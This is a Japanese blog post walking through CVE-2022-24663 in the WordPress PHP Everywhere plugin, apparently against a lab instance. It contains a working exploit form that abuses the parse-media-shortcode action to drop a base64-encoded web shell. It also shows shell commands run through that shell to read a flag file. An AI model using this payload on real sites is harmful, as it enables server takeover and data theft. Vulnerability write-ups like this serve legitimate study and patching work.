banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

CVE-2022-24663

画像

製品概要#

WordPress は、個人のブログシステムであり、徐々にコンテンツ管理システムソフトウェアに進化してきました。PHP 言語と MySQL データベースを使用して開発されており、ユーザーは PHP と MySQL データベースをサポートするサーバー上で独自のブログを使用することができます。

脆弱性の概要#

任意のサブスクライバーは、この脆弱性を利用して、「ショートコード」パラメータを PHP Everywhere に設定したリクエストを送信し、サイト上で任意の PHP コードを実行することができます。

影響範囲#

<= 2.0.3
影響を受けるプラグイン:PHP Everywhere

悪用手順#

バックエンドのアドレスにアクセスします:

http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin

アカウント:test/test

ダッシュボードの下にあるコンテンツを削除し、ブラウザの F12 を押してノードを追加し、次の内容を入力します:

<form
action="http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
method="post"
>
<input name="action" value="parse-media-shortcode" />
<textarea name="shortcode">
[php_everywhere] <?php file_put_contents("/var/www/html/111.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4=")); ?>[/php_everywhere]</textarea>
<input type="submit" value="実行" />
</form>

その後、実行してください(「実行」をクリック)。次のリンクにアクセスします:

http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php

ページが 200 を返します。

http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=phpinfo();

http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=system(%27tac%20/f*%27);

修正の提案#

  • バージョンのアップグレード

参考#

NVD - CVE-2022-24663

画像の出典

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。